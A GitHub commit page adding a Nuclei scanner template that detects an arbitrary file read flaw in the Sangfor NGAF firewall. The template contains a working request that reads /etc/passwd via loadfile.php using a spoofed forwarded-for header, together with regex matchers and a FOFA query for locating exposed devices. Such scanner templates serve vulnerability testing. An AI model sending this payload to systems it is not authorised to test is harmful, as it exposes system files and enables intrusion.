Skip to content

Commit

Permalink
Create sangfor-ngaf-lfi.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
DhiyaneshGeek authored Oct 5, 2023
1 parent bdc537d commit 22a07ca
Showing 1 changed file with 40 additions and 0 deletions.
40 changes: 40 additions & 0 deletions http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
id: sangfor-nextgen-lfi

info:
name: Sangfor Next Gen Application Firewall - Arbitary File Read
author: DhiyaneshDk
severity: high
description: |
Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
reference:
- https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
metadata:
verified: true
max-request: 1
fofa-query: title="SANGFOR | NGAF"
tags: sangfor,lfi

http:
- raw:
- |
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: {{Hostname}}
y-forwarded-for: 127.0.0.1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"

- type: word
part: header
words:
- 'filename="passwd"'
- 'application/octet-stream'
condition: and

- type: status
status:
- 200

0 comments on commit 22a07ca

Please sign in to comment.